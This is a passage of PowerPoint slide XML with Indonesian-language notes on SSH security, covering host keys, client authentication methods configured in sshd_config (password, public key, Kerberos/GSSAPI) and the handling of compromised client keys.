              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Klien SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. Masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file /etc/ ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server RADIUS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kerberos - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kerberos (Ticket Granting Ticket) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Generic Security Services Application Program Interface (GSSAPI). Server SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru-baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, hapus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server SSH. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hapus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
